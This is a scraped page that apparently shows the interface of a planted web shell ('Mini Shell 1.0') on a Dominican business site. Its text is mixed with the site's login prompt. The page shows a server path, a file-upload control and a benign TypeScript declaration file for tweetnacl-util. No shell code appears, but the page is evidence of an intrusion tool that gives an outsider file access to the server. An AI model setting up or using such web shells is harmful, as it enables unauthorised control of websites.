HOME


Mini Shell 1.0
Negocios La Pieza.DO | Registrate o Inicia Sesión

Inicie Sesión en su Cuenta de Negocios

Olvidó Contraseña?
DIR: /var/www/devs.lapieza.net/node_modules/pusher-js/src/d.ts/tweetnacl-util/
Upload File :
Current File : //var/www/devs.lapieza.net/node_modules/pusher-js/src/d.ts/tweetnacl-util/index.d.ts
declare module 'tweetnacl-util' {
  export function encodeUTF8(data: Uint8Array): string;
  export function decodeUTF8(data: string): Uint8Array;
  export function encodeBase64(data: Uint8Array): string;
  export function decodeBase64(data: string): Uint8Array;
}